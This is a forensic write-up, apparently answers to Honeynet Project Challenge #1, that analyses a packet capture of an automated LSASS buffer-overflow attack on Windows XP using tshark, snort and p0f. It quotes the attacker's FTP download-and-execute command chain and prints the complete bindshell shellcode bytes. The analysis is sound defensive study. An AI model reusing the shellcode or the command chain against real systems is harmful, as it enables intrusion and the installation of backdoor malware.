Honeynet Project Challenge #1 - pcap attack trace

tags: netsec, honeynet, pcap, forensic, 2010
pcap | official solution
  1. Which systems (i.e. IP addresses) are involved?
  2. tshark -r atk-trace.pcap -z ip_hosts,tree -qn
    unique IP addr: tshark -r atk-trace.pcap -T fields -e ip.dst -e ip.src | sort | uniq
    unique MAC addr: tshark -r atk-trace.pcap -T fields -e eth.dst -e eth.src | sort | uniq
  3. What can you find out about the attacking host (e.g., where is it located)?
  4. p0f -r atk-trace.pcap
    tshark -r atk-trace.pcap -Y "tcp.flags==0x02" -n
    sudo snort -q -A console -r atk-trace.pcap
    geoiplookup 98.114.205.102
  5. How many TCP sessions are contained in the dump file?
  6. tshark -r atk-trace.pcap -qnz conv,tcp
  7. How long did it take to perform the attack?
  8. capinfos atk-trace.pcap
  9. Which operating system was targeted by the attack? And which service? Which vulnerability?
  10. [os] atk-trace.pcap > pkt#16 > Native OS: Windows 5.1 i.e. Windows XP
    [svc] Local Security Authority Subsystem Service (LSASS)
    sudo snort -q -A console -c snort.conf -r atk-trace.pcap
    04/20-11:28:30.172468
    [**] [1:2514:7] NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt
    [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1]
    {TCP} 98.114.205.102:1828 -> 192.150.11.111:445
  11. Can you sketch an overview of the general actions performed by the attacker?
    1. port scan 445/tcp
    2. connect to \\192.150.11.111\ipc$\lsarpc
    3. exploit + bind shell to port 1957/tcp
    4. connect to port 1957/tcp to execute echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe
      ssms.exe
  12. What specific vulnerability was attacked?
  13. stack buffer overflow in DsRolerUpgradeDownlevelServer() function of LSASS, subsequently used for remote code exec
  14. What actions does the shellcode perform? Pls list the shellcode.
  15. bindshell on port 1957/tcp
    \xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x7d\x01\x80\x34\x0a\x99\xe2\xfa\xeb\x05\xe8\xeb\xff\xff\xff\x70\x95\x98\x99\x99\xc3\xfd\x38\xa9\x99\x99\x99\x12\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91\x12\x41\x12\xea\xa5\x12\xed\x87\xe1\x9a\x6a\x12\xe7\xb9\x9a\x62\x12\xd7\x8d\xaa\x74\xcf\xce\xc8\x12\xa6\x9a\x62\x12\x6b\xf3\x97\xc0\x6a\x3f\xed\x91\xc0\xc6\x1a\x5e\x9d\xdc\x7b\x70\xc0\xc6\xc7\x12\x54\x12\xdf\xbd\x9a\x5a\x48\x78\x9a\x58\xaa\x50\xff\x12\x91\x12\xdf\x85\x9a\x5a\x58\x78\x9b\x9a\x58\x12\x99\x9a\x5a\x12\x63\x12\x6e\x1a\x5f\x97\x12\x49\xf3\x9a\xc0\x71\x1e\x99\x99\x99\x1a\x5f\x94\xcb\xcf\x66\xce\x65\xc3\x12\x41\xf3\x9c\xc0\x71\xed\x99\x99\x99\xc9\xc9\xc9\xc9\xf3\x98\xf3\x9b\x66\xce\x75\x12\x41\x5e\x9e\x9b\x99\x9e\x3c\xaa\x59\x10\xde\x9d\xf3\x89\xce\xca\x66\xce\x69\xf3\x98\xca\x66\xce\x6d\xc9\xc9\xca\x66\xce\x61\x12\x49\x1a\x75\xdd\x12\x6d\xaa\x59\xf3\x89\xc0\x10\x9d\x17\x7b\x62\x10\xcf\xa1\x10\xcf\xa5\x10\xcf\xd9\xff\x5e\xdf\xb5\x98\x98\x14\xde\x89\xc9\xcf\xaa\x50\xc8\xc8\xc8\xf3\x98\xc8\xc8\x5e\xde\xa5\xfa\xf4\xfd\x99\x14\xde\xa5\xc9\xc8\x66\xce\x79\xcb\x66\xce\x65\xca\x66\xce\x65\xc9\x66\xce\x7d\xaa\x59\x35\x1c\x59\xec\x60\xc8\xcb\xcf\xca\x66\x4b\xc3\xc0\x32\x7b\x77\xaa\x59\x5a\x71\x76\x67\x66\x66\xde\xfc\xed\xc9\xeb\xf6\xfa\xd8\xfd\xfd\xeb\xfc\xea\xea\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xdc\xe1\xf0\xed\xcd\xf1\xeb\xfc\xf8\xfd\x99\xd5\xf6\xf8\xfd\xd5\xf0\xfb\xeb\xf8\xeb\xe0\xd8\x99\xee\xea\xab\xc6\xaa\xab\x99\xce\xca\xd8\xca\xf6\xfa\xf2\xfc\xed\xd8\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed\x99\xfa\xf5\xf6\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99
  16. Do you think a Honeypot was used to pose as a vulnerable victim? Why?
  17. yes, it ignores instruction to connect to an ftp service @ invalid IPv4 address 0.0.0.0
  18. Was there malware involved? What's the name of the malware?
  19. yes; an Rbot backdoor
  20. Do you think this is a manual or an automated attack? Why?
  21. automated; attack duration too short (~16s) to be manual, invalid IPv4 address 0.0.0.0 specified